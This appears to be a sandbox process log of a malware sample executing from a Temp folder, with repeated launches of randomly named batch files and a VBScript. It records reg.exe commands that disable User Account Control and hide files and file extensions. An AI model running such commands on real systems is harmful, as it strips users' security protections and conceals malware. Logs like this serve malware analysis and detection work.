reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCcowYMg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QEEwQcEk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aWQAwQcs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zsAIgsMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vKgEYcos.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tKQEUcUI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kUYgssgM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fcUkAQwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xscgEIwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TGgskcUo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGkUEowM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AGkgkosU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zWkkAUEc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XcQcQUoo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JcoEgcQg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FewQcMcQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZgUwcMIw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv la2qyzT3okuaHQyQ+cgrQA.0.2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gCkkcskY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hOoIAMcI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

